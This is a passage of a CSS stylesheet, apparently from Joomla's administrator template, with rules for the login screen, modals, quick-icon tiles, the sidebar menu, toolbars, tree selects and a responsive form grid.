  border-radius: 0.25rem 0 0 0.25rem;
}

.subform-repeatable-group[draggable=true] {
  background-color: #20c997;
}
.subform-repeatable-group[draggable=true] > td {
  background-color: #20c997;
}

.icon-white {
  color: #fff;
}

.tbody-icon {
  padding: 0 3px;
  text-align: center;
  background-color: transparent;
  border: 0;
}
.tbody-icon [class^=icon-],
.tbody-icon [class*=" icon-"],
.tbody-icon [class^=fa-],
.tbody-icon [class*=" fa-"] {
  width: 26px;
  height: 26px;
  font-size: 1rem;
  line-height: 22px;
  color: #cdcdcd;
  border: 2px solid var(--border);
  border-radius: 50%;
}
.tbody-icon .icon-publish,
.tbody-icon .icon-check,
.tbody-icon .fa-check {
  color: var(--success);
  border-color: var(--success);
}
.tbody-icon .icon-home,
.tbody-icon .icon-color-featured,
.tbody-icon .icon-star.featured,
.tbody-icon .fa-star.featured {
  color: #ffb514;
  border-color: #ffb514;
}
.tbody-icon .icon-archive,
.tbody-icon .icon-folder,
.tbody-icon .fa-folder {
  color: var(--template-text-dark);
  border-color: #495057;
}
.tbody-icon .icon-checkedout,
.tbody-icon .icon-lock,
.tbody-icon .fa-lock {
  width: auto;
  height: auto;
  font-size: 1.2rem;
  line-height: 1rem;
  color: var(--template-text-dark);
  border: 0;
}
.tbody-icon.home-disabled, .tbody-icon.featured-disabled, .tbody-icon.color-featured-disabled, .tbody-icon.icon-star-disabled, .tbody-icon.fa-star-disabled {
  cursor: not-allowed;
  opacity: 1;
}
.tbody-icon.disabled .icon-home, .tbody-icon.disabled .fa-home {
  color: #fffcf4;
  border-color: #fffcf4;
}

.plg_system_webauthn_login_button svg {
  -webkit-margin-end: 2px;
          margin-inline-end: 2px;
}

.plg_system_webauthn_login_button svg path {
  fill: var(--white);
}

.badge > span {
  -webkit-margin-end: 0.5rem;
          margin-inline-end: 0.5rem;
}

iframe {
  border: 0;
}

.modal iframe {
  width: 100%;
}

.options-form {
  width: 100%;
  padding: 1vw 2vw;
  margin-bottom: 1rem;
  color: var(--template-text-dark);
  border: 1px solid var(--template-bg-dark-20);
}
.options-form > legend {
  float: none;
  width: auto;
  padding: 0 1rem;
  font-weight: 700;
  color: var(--template-text-dark);
  background-color: #fff;
}

.view-login .container-main,
.task-logout .container-main {
  order: 1;
}
@media (max-width: 767.98px) {
  .view-login .container-main,
.task-logout .container-main {
    display: flex;
    flex-wrap: wrap;
    align-items: center;
    justify-content: center;
    min-height: calc(100vh - 35vh);
  }
}
@media (max-width: 767.98px) {
  .view-login .container-main #content,
.task-logout .container-main #content {
    max-width: 98%;
    padding: 0;
  }
}
.view-login .login,
.task-logout .login {
  width: 100%;
  max-width: 25rem;
  padding: 30px;
  margin: 1rem;
  color: var(--template-text-dark);
  background: var(--white);
  border-radius: 10px;
  box-shadow: 0 4px 20px -10px var(--template-bg-dark-50);
}
@media (max-width: 991.98px) {
  .view-login .login,
.task-logout .login {
    margin-bottom: 3rem;
  }
}
.view-login .login img,
.task-logout .login img {
  max-height: 4.4rem;
}
.view-login .login .logo,
.task-logout .login .logo {
  padding: 0 20px 20px;
}
.view-login .login svg.joomla-logo,
.task-logout .login svg.joomla-logo {
  width: 2.4rem;
  height: 4.4rem;
  background-size: 4.4rem 2.4rem;
}
.view-login .login svg.joomla-logo path,
.task-logout .login svg.joomla-logo path {
  fill: var(--template-bg-dark);
}
.view-login .login-watermark,
.task-logout .login-watermark {
  position: absolute;
  z-index: -1;
  max-width: 500px;
  -webkit-transform: rotate(12deg) translate(40%, 10%);
          transform: rotate(12deg) translate(40%, 10%);
}
.view-login .form-group,
.task-logout .form-group {
  position: relative;
  margin-bottom: 1.85rem;
}
.view-login .form-group label span,
.task-logout .form-group label span {
  font-size: 0.9rem;
}
@media (max-width: 575.98px) {
  .view-login .form-group label span,
.task-logout .form-group label span {
    width: 100%;
  }
}
.view-login .form-group label span.text-end,
.task-logout .form-group label span.text-end {
  font-size: 0.75rem;
  color: var(--template-special-color);
}
.view-login .form-group .form-control-feedback,
.task-logout .form-group .form-control-feedback {
  position: absolute;
  right: 0;
  bottom: -1.5rem;
  font-size: 0.75rem;
  text-align: right;
}
[dir=rtl] .view-login .form-group .form-control-feedback,
[dir=rtl] .task-logout .form-group .form-control-feedback {
  right: auto;
  left: 0;
  text-align: left;
}
.view-login .form-group .form-control-hint,
.task-logout .form-group .form-control-hint {
  position: absolute;
  top: 0.1rem;
  right: 0;
  font-size: 0.75rem;
  text-align: right;
}
[dir=rtl] .view-login .form-group .form-control-hint,
[dir=rtl] .task-logout .form-group .form-control-hint {
  right: auto;
  left: 0;
  text-align: left;
}
.view-login input:focus,
.view-login select:focus,
.task-logout input:focus,
.task-logout select:focus {
  background: #fff;
  box-shadow: inset 0 0 1px 1px var(--template-contrast);
}
.view-login h1, .view-login .h1,
.task-logout h1,
.task-logout .h1 {
  margin-bottom: 0.25rem;
  color: #fff;
  text-align: center;
}
.view-login h2, .view-login .h2,
.task-logout h2,
.task-logout .h2 {
  font-weight: 400;
  color: var(--template-bg-dark-10);
}
@media (max-width: 575.98px) {
  .view-login .btn,
.task-logout .btn {
    padding: 8px 10px;
    font-size: 0.875rem;
  }
}
.view-login .form-control,
.view-login .form-select,
.view-login .custom-select,
.task-logout .form-control,
.task-logout .form-select,
.task-logout .custom-select {
  max-width: none;
}
.view-login .sidebar-wrapper,
.view-login .header .logo,
.task-logout .sidebar-wrapper,
.task-logout .header .logo {
  flex: 1 0 400px;
}
.view-login .sidebar-wrapper,
.task-logout .sidebar-wrapper {
  display: flex;
  flex-direction: column;
  max-width: none;
  background-color: var(--template-sidebar-bg);
}
@media (max-width: 767.98px) {
  .view-login .sidebar-wrapper,
.task-logout .sidebar-wrapper {
    order: 2;
    margin-bottom: 3rem;
  }
}
.view-login .sidebar-wrapper .main-brand,
.task-logout .sidebar-wrapper .main-brand {
  margin-bottom: auto;
}
.view-login .sidebar-wrapper .main-brand a,
.task-logout .sidebar-wrapper .main-brand a {
  font-size: 0.875rem;
}
.view-login .sidebar-wrapper .card-header,
.task-logout .sidebar-wrapper .card-header {
  font-size: 1.125rem;
  color: #fff;
}
.view-login #sidebar,
.task-logout #sidebar {
  align-self: flex-end;
  width: 100%;
  font-size: 0.875rem;
  color: var(--template-text-light);
  text-align: center;
}
.view-login #sidebar .card,
.task-logout #sidebar .card {
  background: rgba(0, 0, 0, 0.1);
  box-shadow: none;
}
.view-login #sidebar .card .module-body,
.task-logout #sidebar .card .module-body {
  padding: 0.75rem 1.25rem;
}
@media (max-width: 767.98px) {
  .view-login #sidebar,
.task-logout #sidebar {
    position: relative;
    bottom: 0;
  }
}
@media (max-width: 767.98px) {
  .view-login .container-main,
.view-login .sidebar-wrapper,
.task-logout .container-main,
.task-logout .sidebar-wrapper {
    flex: 1 0 100% !important;
    max-width: 100% !important;
    min-height: auto;
  }
}
.view-login .wrapper,
.task-logout .wrapper {
  display: flex;
}
@media (max-width: 767.98px) {
  .view-login .wrapper,
.task-logout .wrapper {
    flex-direction: column;
  }
}
.view-login .header,
.task-logout .header {
  display: flex;
}
.view-login .header .logo.small,
.task-logout .header .logo.small {
  line-height: 2.5rem;
}
@media (max-width: 767.98px) {
  .view-login .header,
.task-logout .header {
    background: var(--template-bg-dark-70);
  }
}

label {
  color: #132f53;
}

.com_login .sidebar-wrapper .main-brand {
  flex: 1;
  flex-basis: auto;
  margin-top: 100px;
  text-align: center;
}
@media (max-width: 767.98px) {
  .com_login .sidebar-wrapper .main-brand {
    margin-top: 10px;
  }
}

.com_login .sidebar-wrapper #sidebar p {
  margin-bottom: 0.2rem;
}

.com_login .sidebar-wrapper .main-brand a,
.com_login .sidebar-wrapper #sidebar,
.com_login .sidebar-wrapper #sidebar a {
  color: var(--template-text-light);
}

@media (max-width: 767.98px) {
  .view-login #wrapper.d-flex {
    display: flex !important;
  }
}
@media (max-width: 767.98px) {
  .view-login #sidebar-wrapper:not(.show):not(.collapse) {
    display: block;
  }
}
.view-login .invalid .form-control-feedback {
  color: var(--danger);
}

.ie11 {
  display: none;
}

@media all and (-ms-high-contrast: none), (-ms-high-contrast: active) {
  .ie11 {
    display: block;
  }
}
.login_message {
  margin: 1rem 1rem 0;
}

.modal .btn {
  padding: 0 22px;
  -webkit-margin-end: 0.5rem;
          margin-inline-end: 0.5rem;
  font-size: 1rem;
  line-height: 2.3rem;
  color: var(--template-text-dark);
  background: var(--white);
  border-color: var(--whiteoffset);
  box-shadow: 1px 1px 1px 0 rgba(0, 0, 0, 0.25);
}
.modal .btn-primary:not([href]),
.modal .btn-success:not([href]),
.modal .btn-danger:not([href]),
.modal .btn-secondary:not([href]) {
  color: var(--template-text-dark);
  background: var(--white);
  border: 1px solid var(--template-text-dark);
}
.modal .btn-primary:not([href]):hover {
  color: var(--white);
  background: var(--primary);
  border-color: var(--primary);
}
.modal .btn-secondary:not([href]):hover {
  color: var(--white);
  background: var(--secondary);
  border-color: var(--secondary);
}
.modal .btn-success:not([href]):hover {
  color: var(--white);
  background: var(--success);
  border-color: var(--success);
}
.modal .btn-danger:not([href]):hover {
  color: var(--white);
  background: var(--danger);
  border-color: var(--danger);
}
.modal .btn.btn-danger [class^=icon-],
.modal .btn.btn-danger [class*=" icon-"],
.modal .btn.btn-danger [class^=fa-],
.modal .btn.btn-danger [class*=" fa-"],
.modal .btn.btn-danger span {
  display: inline-block;
  width: 2.375rem;
  height: 100%;
  margin: 0 16px;
  -webkit-margin-start: -22px;
          margin-inline-start: -22px;
  line-height: 2.375rem;
  color: rgba(255, 255, 255, 0.9);
  background-color: var(--danger);
}
.modal .btn.btn-success [class^=icon-],
.modal .btn.btn-success [class*=" icon-"],
.modal .btn.btn-success [class^=fa-],
.modal .btn.btn-success [class*=" fa-"],
.modal .btn.btn-success span {
  display: inline-block;
  width: 2.375rem;
  height: 100%;
  margin: 0 16px;
  -webkit-margin-start: -22px;
          margin-inline-start: -22px;
  line-height: 2.375rem;
  color: rgba(255, 255, 255, 0.9);
  background-color: var(--success);
}

.modal-header {
  padding: 0 15px;
}

.modal-body {
  overflow-y: initial;
}

.modal-title {
  font-weight: 400;
  line-height: 2.875rem;
}

.contentpane {
  padding: 20px;
}

.changelog {
  text-align: start !important;
}
.changelog__item {
  display: flex;
  border-bottom: 1px solid #dee2e6;
}
@media (max-width: 767.98px) {
  .changelog__item {
    flex-direction: column;
  }
}
.changelog__tag {
  flex: 1 0 180px;
  max-width: 180px;
  padding: 10px 15px;
  text-align: end;
  background: #f1f3f5;
  border-right: 1px solid #dee2e6;
}
.changelog__tag .badge {
  border-radius: 0.2rem;
}
.changelog__tag .badge.badge-jlanguage {
  background-color: #fff;
}
@media (max-width: 767.98px) {
  .changelog__tag {
    flex: 1 0 auto;
    max-width: 100%;
    text-align: left;
    border-right: 0;
    border-bottom: 1px solid #dee2e6;
  }
}
.changelog__list {
  padding: 10px 15px;
}
.changelog__list ul {
  -webkit-padding-start: 15px;
          padding-inline-start: 15px;
  margin-bottom: 0;
}
.changelog__list li {
  margin-bottom: 0.15rem;
}
.changelog__list li:last-of-type {
  margin-bottom: 0;
}

.quick-icons {
  background-color: #fff;
}
.quick-icons .nav {
  display: grid;
  grid-template-columns: repeat(auto-fit, minmax(190px, 1fr));
  grid-gap: 1rem;
}
.quick-icons a {
  text-decoration: none;
}
.quick-icons ul {
  padding: 0;
}
.quick-icons .quickicon {
  --text-color: hsl(var(--hue), 30%, 40%);
  --bg-color: hsl(var(--hue), 60%, 97%);
  --icon-color: hsl(var(--hue), 30%, 40%);
  --bg-color-hvr: var(--template-bg-dark);
  display: flex;
  flex-grow: 1;
}
.quick-icons .quickicon a {
  display: flex;
  flex-direction: column;
  flex-grow: 1;
  justify-content: flex-end;
  padding: 0 1rem;
  color: var(--text-color);
  background-color: var(--bg-color);
  transition: all 0.25s ease;
}
.quick-icons .quickicon a .quickicon-icon {
  margin-top: 0.5rem;
  -webkit-margin-start: 0.2rem;
          margin-inline-start: 0.2rem;
}
.quick-icons .quickicon a .quickicon-icon > * {
  font-size: 2rem;
  color: var(--icon-color);
}
.quick-icons .quickicon a .quickicon-name {
  padding: 0.125rem 0 0.6rem;
  font-size: 0.875rem;
  font-weight: bold;
}
.quick-icons .quickicon a .quickicon-amount {
  padding: 0.25rem 0.5rem;
  font-weight: 700;
  line-height: 1rem;
  background: hsl(var(--hue), 50%, 93%);
  border-radius: 0.25rem;
  transition: all 0.25s ease;
  -webkit-margin-start: 0.5rem;
          margin-inline-start: 0.5rem;
}
.quick-icons .quickicon a .j-links-link {
  display: block;
  padding: 0 0.2rem;
  line-height: 1.1;
}
.quick-icons .quickicon a:hover, .quick-icons .quickicon a:focus, .quick-icons .quickicon a:active {
  color: #fff;
  text-decoration: none;
  background: var(--bg-color-hvr);
}
.quick-icons .quickicon a:hover .quickicon-amount, .quick-icons .quickicon a:focus .quickicon-amount, .quick-icons .quickicon a:active .quickicon-amount {
  background: var(--icon-color);
}
.quick-icons .quickicon a.warning, .quick-icons .quickicon a.danger {
  --text-color: var(--danger);
  --bg-color: #f4f0f0;
  --icon-color: #ce8484;
  --bg-color-hvr: var(--danger);
}
.quick-icons .quickicon a.success {
  --text-color: var(--success);
  --bg-color: #f3f9f3;
  --icon-color: #55a258;
  --bg-color-hvr: var(--success);
}
.quick-icons .quickicon-info {
  display: flex;
  align-items: flex-end;
}
.quick-icons .quickicon-linkadd {
  width: 2.5rem;
  font-size: 1.2rem;
  background: hsl(var(--hue), 50%, 93%);
  transition: all 0.25s ease;
}
.quick-icons .quickicon-linkadd a {
  align-items: flex-end;
  justify-content: center;
  width: 100%;
}
.quick-icons .quickicon-linkadd a > * {
  margin-bottom: 10px;
  color: hsl(var(--hue), 30%, 40%);
}
.quick-icons .quickicon-linkadd a:hover, .quick-icons .quickicon-linkadd a:focus, .quick-icons .quickicon-linkadd a:active {
  background: var(--template-bg-dark);
}
.quick-icons .quickicon-linkadd a:hover *, .quick-icons .quickicon-linkadd a:focus *, .quick-icons .quickicon-linkadd a:active * {
  color: #fff;
}
.quick-icons .quickicon-single,
.quick-icons .quickicon-group {
  display: flex;
  min-height: 6rem;
  overflow: hidden;
  border: 1px solid hsl(var(--hue), 50%, 93%);
  border-radius: 4px;
}

#content .menu-quicktask {
  position: absolute;
}
[dir=ltr] #content .menu-quicktask {
  right: 1.25rem;
}
[dir=rtl] #content .menu-quicktask {
  left: 1.25rem;
}

#content form .name.break-word {
  word-break: break-word;
}

.sidebar-wrapper {
  z-index: 1010;
  min-height: calc(100vh - 66px);
  overflow: hidden;
  background-color: var(--template-sidebar-bg);
  box-shadow: 0 0 20px -10px var(--template-bg-dark-50);
}
.sidebar-wrapper .sidebar-sticky {
  position: sticky;
  top: 0;
}
.sidebar-wrapper .item {
  position: relative;
  display: flex;
  flex-wrap: wrap;
  list-style-type: none;
}
.sidebar-wrapper .item a,
.sidebar-wrapper .item .menu-dashboard,
.sidebar-wrapper .item .menu-quicktask {
  color: #fff;
  text-decoration: none;
}
.sidebar-wrapper .item a:hover,
.sidebar-wrapper .item .menu-dashboard:hover,
.sidebar-wrapper .item .menu-quicktask:hover {
  color: var(--template-text-light);
  text-decoration: none;
  background-color: var(--template-bg-dark-65);
}
.sidebar-wrapper .item > a {
  position: relative;
  display: flex;
  flex-grow: 1;
  align-items: center;
  min-height: 40px;
}
.sidebar-wrapper .item > a [class^=icon-],
.sidebar-wrapper .item > a [class*=" icon-"],
.sidebar-wrapper .item > a [class^=fa-],
.sidebar-wrapper .item > a [class*=" fa-"] {
  margin: 0 0.85rem;
  -webkit-transform: scale(1.2);
          transform: scale(1.2);
}
.sidebar-wrapper .item-level-2 > a {
  -webkit-padding-start: 3rem;
          padding-inline-start: 3rem;
}
.sidebar-wrapper .item-level-3 > a {
  -webkit-padding-start: 3.75rem;
          padding-inline-start: 3.75rem;
}
@media (min-width: 576px) {
  .sidebar-wrapper {
    flex: 1 0 18rem;
    max-width: 18rem;
    transition: all 0.3s ease-in-out;
  }
}
@media (max-width: 575.98px) {
  .sidebar-wrapper.sidebar-menu {
    top: auto;
  }
}
.sidebar-wrapper .sidebar-toggle {
  background: var(--template-bg-dark-60);
}
.sidebar-wrapper .sidebar-toggle a {
  color: #fff;
}
.sidebar-wrapper .sidebar-toggle .sidebar-item-title {
  white-space: nowrap;
}

.main-nav {
  width: 18rem;
  padding: 0;
  font-size: 0.95rem;
}
@media (max-width: 575.98px) {
  .main-nav {
    width: 100%;
  }
}
.main-nav li .menu-dashboard > a,
.main-nav li .menu-quicktask > a {
  display: inline-flex;
  align-items: center;
  justify-content: center;
  width: 40px;
  height: 100%;
}
.main-nav ul {
  width: 100%;
  padding: 0;
  background-color: var(--template-bg-dark-75);
}
.main-nav .divider {
  height: 1px;
  margin: 0 0 0 48px;
  list-style: none;
  background-color: var(--template-bg-dark-60);
}
.main-nav .menuitem-group {
  margin-top: 0.65rem;
  font-size: 0.75rem;
  -webkit-padding-start: 3rem;
          padding-inline-start: 3rem;
}
.main-nav .menuitem-group .sidebar-item-title {
  color: var(--template-bg-dark-30);
}
.main-nav .has-arrow .sidebar-item-title {
  -webkit-margin-end: auto;
          margin-inline-end: auto;
}
.main-nav .has-arrow::after {
  display: flex;
  align-items: center;
  justify-content: center;
  width: 2rem;
  font-family: "Font Awesome 5 Free";
  font-weight: 900;
}
[dir=ltr] .main-nav .has-arrow::after {
  content: "";
}
[dir=rtl] .main-nav .has-arrow::after {
  content: "";
}
.main-nav a.mm-active {
  background-color: var(--template-bg-dark-70);
}
.main-nav a.mm-active + .menu-quicktask {
  background-color: var(--template-bg-dark-60);
}
.main-nav .mm-active > .has-arrow::after {
  content: "";
}
.main-nav .mm-collapse {
  display: none;
}
.main-nav .mm-collapse.mm-collapsed, .main-nav .mm-collapse.mm-show {
  display: block;
}
.main-nav .mm-collapsing {
  position: relative;
  height: 0;
  overflow: hidden;
  transition: all 0.35s ease;
}
.main-nav .badge {
  align-self: center;
  margin: 0 0.3rem 0.25rem;
  background-color: var(--template-bg-dark-60);
}

.closed .sidebar-wrapper {
  flex: 1 0 3rem;
  max-width: 3rem;
  overflow: visible;
}
.closed .sidebar-item-title,
.closed .has-arrow::after,
.closed .menu-dashboard {
  display: none;
}
.closed .main-nav,
.closed .main-nav li {
  max-width: 3rem;
}
.closed .main-nav a:hover {
  position: relative;
  max-width: 3rem;
}
.closed .main-nav a:hover .sidebar-item-title {
  position: absolute;
  left: 100%;
  display: flex;
  align-items: center;
  height: 100%;
  padding: 0 1rem;
  white-space: nowrap;
  pointer-events: none;
  background-color: var(--template-bg-dark-60);
  border-radius: 0 0.25rem 0.25rem 0;
}
[dir=rtl] .closed .main-nav a:hover .sidebar-item-title {
  right: 100%;
  left: unset;
  border-radius: 0.25rem 0 0 0.25rem;
}
.closed .main-nav > li > ul {
  height: 0;
  padding: 0;
  visibility: hidden;
}

@media (min-width: 576px) {
  .toggler-burger {
    display: none;
  }
}
@media (max-width: 575.98px) {
  #menu-collapse {
    display: none;
    background: var(--template-bg-dark-50);
  }

  .toggler-burger {
    position: fixed;
    right: 0;
    bottom: 0;
    z-index: 9999;
    padding: 10px 15px;
  }
  [dir=rtl] .toggler-burger {
    right: auto;
    left: 0;
  }
  .toggler-burger:focus {
    box-shadow: none;
  }
  .toggler-burger .navbar-toggler-icon::before {
    display: inline-block;
    font: normal normal 900 28px/1 "Font Awesome 5 Free";
    color: var(--toggle-color);
    content: "";
  }
  .toggler-burger.collapsed .navbar-toggler-icon::before {
    content: "";
  }

  .sidebar-menu {
    display: none;
  }
  .sidebar-menu.show, .sidebar-menu.collapsing {
    position: fixed;
    bottom: 55px;
    z-index: 9000;
    display: block;
    width: 100%;
    min-height: auto;
    max-height: calc(100vh - 72px);
    overflow-y: auto;
  }
}
.sidebar-nav {
  padding: 1rem 2rem;
}
.sidebar-nav li {
  font-size: 0.9rem;
  font-weight: 700;
}
.sidebar-nav li.divider {
  margin: 0.3rem 0;
}
.sidebar-nav li a {
  display: block;
  padding: 0.25rem;
  font-weight: 400;
  color: var(--template-text-dark);
  text-decoration: none;
}
.sidebar-nav li a::before {
  margin-right: 0.5rem;
  font-family: "Font Awesome 5 Free";
  font-weight: 900;
  content: "";
}
[dir=rtl] .sidebar-nav li a::before {
  margin-right: 0;
  content: none;
}
[dir=rtl] .sidebar-nav li a::after {
  -webkit-margin-end: 0.5rem;
          margin-inline-end: 0.5rem;
  font-family: "Font Awesome 5 Free";
  font-weight: 900;
  content: "";
}
.sidebar-nav li.item:hover, .sidebar-nav li.active {
  background-color: var(--template-bg-dark-60);
}
.sidebar-nav li.item:hover a, .sidebar-nav li.active a {
  color: var(--template-text-light);
}

.switcher .toggle-outside {
  border: solid 1px var(--template-bg-dark-20);
  border-radius: 0.25rem;
}
.switcher .toggle-outside:focus {
  box-shadow: inset 0 0 0 0.1rem #e9e9e9;
}
.switcher input:focus ~ .toggle-outside {
  border-color: #39f;
  box-shadow: 0 0 0 0.2rem #eaeaea;
}

.disabled {
  opacity: 0.4;
}

.subhead {
  position: sticky;
  top: 0;
  right: 0;
  left: 0;
  z-index: 1000;
  width: auto;
  min-height: 43px;
  padding: 8px 1rem;
  color: var(--template-text-dark);
  background: #fff;
  background-image: linear-gradient(var(--toolbar-bg), var(--template-bg-dark-3));
  box-shadow: 0 2px 10px -8px var(--template-bg-dark-50);
}
.subhead .row {
  margin-right: 0;
  margin-left: 0;
}
.subhead.noshadow {
  box-shadow: none;
}
.subhead joomla-toolbar-button,
.subhead .btn-group {
  -webkit-margin-start: 0.75rem;
          margin-inline-start: 0.75rem;
}
.subhead joomla-toolbar-button:first-child,
.subhead .btn-group:first-child {
  -webkit-margin-start: 0;
          margin-inline-start: 0;
}
.subhead joomla-toolbar-button .btn > span,
.subhead joomla-toolbar-button .dropdown-item > span {
  -webkit-margin-end: 0.5rem;
          margin-inline-end: 0.5rem;
  width: 1.25em;
  text-align: center;
}
.subhead .btn {
  --subhead-btn-accent: var(--template-text-dark);
  padding: 0 1rem;
  margin: 5px 0;
  font-size: 1rem;
  line-height: 2.45rem;
  color: var(--template-text-dark);
  background: #fff;
  border-color: hsl(var(--hue), 20%, 80%);
}
.subhead .btn > span {
  display: inline-block;
  color: var(--subhead-btn-accent);
}
.subhead .btn:not([disabled]):hover, .subhead .btn:not([disabled]):active, .subhead .btn:not([disabled]):focus {
  color: rgba(255, 255, 255, 0.9);
  background-color: var(--subhead-btn-accent);
  border-color: var(--subhead-btn-accent);
}
.subhead .btn:not([disabled]):hover > span, .subhead .btn:not([disabled]):active > span, .subhead .btn:not([disabled]):focus > span {
  color: rgba(255, 255, 255, 0.9);
}
.subhead .btn.btn-success {
  --subhead-btn-accent: var(--success);
}
.subhead .btn.btn-danger {
  --subhead-btn-accent: var(--danger);
}
.subhead .btn.btn-primary {
  --subhead-btn-accent: var(--template-link-color);
}
.subhead .btn.btn-secondary {
  --subhead-btn-accent: var(--template-special-color);
}
.subhead .btn.btn-info {
  --subhead-btn-accent: var(--template-bg-dark);
}
.subhead .btn.btn-action {
  --subhead-btn-accent: var(--template-bg-dark);
  display: flex;
  align-items: center;
}
.subhead .btn.btn-action::after {
  width: 2.375rem;
  font-family: "Font Awesome 5 Free";
  font-weight: 900;
  content: "";
  border: 0;
}
.subhead .btn[disabled], .subhead .btn.dropdown-toggle[disabled] {
  --subhead-btn-accent: var(--template-bg-dark);
  background: rgba(222, 226, 230, 0.8);
  opacity: 0.5;
}
.subhead .btn[disabled]:hover, .subhead .btn[disabled]:active, .subhead .btn[disabled]:focus, .subhead .btn.dropdown-toggle[disabled]:hover, .subhead .btn.dropdown-toggle[disabled]:active, .subhead .btn.dropdown-toggle[disabled]:focus {
  cursor: not-allowed;
}
.subhead .dropdown-toggle.btn {
  -webkit-padding-end: 0;
          padding-inline-end: 0;
}
.subhead .btn-group:not(:last-child) > .dropdown-toggle-split {
  order: 1;
  -webkit-margin-start: -0.25rem;
          margin-inline-start: -0.25rem;
}
[dir=ltr] .subhead .btn-group:not(:last-child) > .dropdown-toggle-split {
  border-radius: 0 0.25rem 0.25rem 0;
}
[dir=rtl] .subhead .btn-group:not(:last-child) > .dropdown-toggle-split {
  border-radius: 0.25rem 0 0 0.25rem;
}
.subhead .dropdown-menu joomla-toolbar-button,
.subhead .btn-group joomla-toolbar-button {
  -webkit-margin-start: 0;
          margin-inline-start: 0;
}
.contentpane .subhead {
  margin: -15px -15px 0;
  background-image: none;
  border-bottom: 1px solid var(--template-bg-dark-7);
}

@media (max-width: 575.98px) {
  joomla-tab[view=accordion] .col-md-9,
joomla-tab[view=accordion] .col-md-3 {
    padding: 0.5rem 1rem !important;
  }

  #myTab {
    margin-top: 1rem;
    margin-bottom: 1.5rem;
  }

  joomla-tab[view=accordion] ul li {
    width: 100%;
  }

  .toggler-toolbar {
    top: 0;
    bottom: auto;
    z-index: 1030;
    padding: 7px 10px;
    margin: 5px;
    background-color: var(--template-bg-dark);
    border-radius: 30px;
  }
  .toggler-toolbar .toggler-toolbar-icon::before {
    font: normal normal 900 28px/1 "Font Awesome 5 Free";
    color: var(--toggle-color);
    content: "";
  }
  .toggler-toolbar.collapsed .toggler-toolbar-icon::before {
    content: "";
  }

  .subhead {
    padding-right: 0;
    padding-left: 0;
  }
  .subhead joomla-toolbar-button,
.subhead .btn-group,
.subhead .btn {
    width: 100%;
    margin-left: 0;
    text-align: left;
  }
  .subhead .btn-toolbar > .btn-group,
.subhead .btn-toolbar > joomla-toolbar-button {
    margin-left: 0;
  }
  .subhead .btn.btn-action::after {
    text-align: center;
    -webkit-margin-start: auto;
            margin-inline-start: auto;
  }
  .subhead .dropdown-toggle-split {
    width: auto;
  }
}
.treeselect {
  display: block;
  padding-left: 0;
  list-style: none;
}
.treeselect .nav-header {
  font-weight: 700;
  color: #212529;
}
.treeselect li {
  position: relative;
  display: block;
  line-height: 2.2rem;
  list-style: none;
}
.treeselect li::before {
  position: absolute;
  top: 14px;
  left: 25px;
  width: 10px;
  height: 1px;
  margin: auto;
  content: "";
  background-color: rgba(0, 0, 0, 0.2);
}
[dir=rtl] .treeselect li::before {
  right: 25px;
  left: 0;
  margin: 0;
}
.treeselect li::after {
  position: absolute;
  top: 0;
  bottom: 0;
  left: 25px;
  width: 1px;
  height: 100%;
  content: "";
  background-color: rgba(0, 0, 0, 0.2);
}
[dir=rtl] .treeselect li::after {
  right: 25px;
  left: 0;
}
.treeselect li:last-child::after {
  height: 14px;
}
.treeselect li li {
  -webkit-padding-start: 40px;
          padding-inline-start: 40px;
}
.treeselect > li::before,
.treeselect > li::after {
  display: none;
}
.treeselect .icon-,
.treeselect .fa- {
  display: none;
}
.treeselect .treeselect-toggle {
  display: inline-block;
  padding: 0;
  margin-right: 0.1rem;
  text-align: center;
  cursor: pointer;
}
.treeselect .treeselect-menu {
  display: inline-block;
}
.treeselect .treeselect-item {
  display: inline-block;
}
.treeselect .treeselect-item input {
  position: relative;
  top: 1px;
  margin-right: 0.2rem;
}
.treeselect .treeselect-item label {
  margin-bottom: 0;
}
.treeselect .dropdown-toggle {
  padding: 0 0.5rem 0.3rem;
  margin-left: 0.5rem;
}
.treeselect .dropdown-toggle::after {
  margin-left: 0;
  font-size: 1rem;
  color: var(--template-text-dark);
}

.treeselect-sub {
  padding-left: 0;
}

.tree-holder ul ul li::before,
.tree-holder ul ul li::after {
  left: 8px;
  display: block;
}
[dir=rtl] .tree-holder ul ul li::before,
[dir=rtl] .tree-holder ul ul li::after {
  right: 8px;
  left: 0;
  margin: 0;
}
.tree-holder ul ul li::before {
  top: 12px;
}
.tree-holder ul ul li:last-child::after {
  height: 12px;
}
.tree-holder li {
  line-height: 1.8rem;
}
.tree-holder li li {
  -webkit-padding-start: 20px;
          padding-inline-start: 20px;
}

* {
  box-sizing: border-box;
}

.element-invisible {
  position: absolute;
  width: 1px;
  height: 1px;
  padding: 0;
  overflow: hidden;
  clip: rect(0, 0, 0, 0);
  white-space: nowrap;
  border: 0;
  -webkit-clip-path: inset(50%);
          clip-path: inset(50%);
}

.hidden {
  display: none;
}

.table-row {
  display: table-row;
}

.form-grid {
  --span-1: span 1;
  --span-2: span 1;
  --span-3: span 1;
  --span-4: span 1;
  --span-5: span 1;
  display: grid;
  grid-template-columns: repeat(1, 1fr);
  grid-gap: 1rem;
}
@media (min-width: 576px) {
  .form-grid {
    --span-2: span 2;
    --span-3: span 2;
    --span-4: span 2;
    --span-5: span 2;
    grid-template-columns: repeat(2, 1fr);
  }
}
@media (min-width: 768px) {
  .form-grid {
    --span-3: span 3;
    --span-4: span 4;
    --span-5: span 4;
    grid-template-columns: repeat(4, 1fr);
    grid-gap: 1rem 2rem;
  }
}
@media (min-width: 992px) {
  .form-grid {
    --span-5: span 5;
    grid-template-columns: repeat(6, 1fr);
  }
}
.form-grid > * {
  grid-column: 1/-1;
}
.form-grid .stack {
  flex-direction: column;
}
.form-grid .span-1 {
  grid-column: 1/var(--span-1);
}
.form-grid .span-1-inline {
  grid-column: var(--span-1);
}
.form-grid .span-2 {
  grid-column: 1/var(--span-2);
}
.form-grid .span-2-inline {
  grid-column: var(--span-2);
}
.form-grid .span-3 {
  grid-column: 1/var(--span-3);
}
.form-grid .span-3-inline {
  grid-column: var(--span-3);
}
.form-grid .span-4 {
  grid-column: 1/var(--span-4);
}
.form-grid .span-4-inline {
  grid-column: var(--span-4);
}
.form-grid .span-5 {
  grid-column: 1/var(--span-5);
}
.form-grid .span-5-inline {
  grid-column: var(--span-5);
}
@media (min-width: 992px) {
  .form-grid .offset-1 {
    grid-column-start: 2;
  }
  .form-grid .offset-2 {
    grid-column-start: 3;
  }
  .form-grid .offset-3 {
    grid-column-start: 4;
  }
  .form-grid .offset-4 {
    grid-column-start: 5;
  }
  .form-grid .offset-5 {
    grid-column-start: 6;
  }
}

.w-1 {
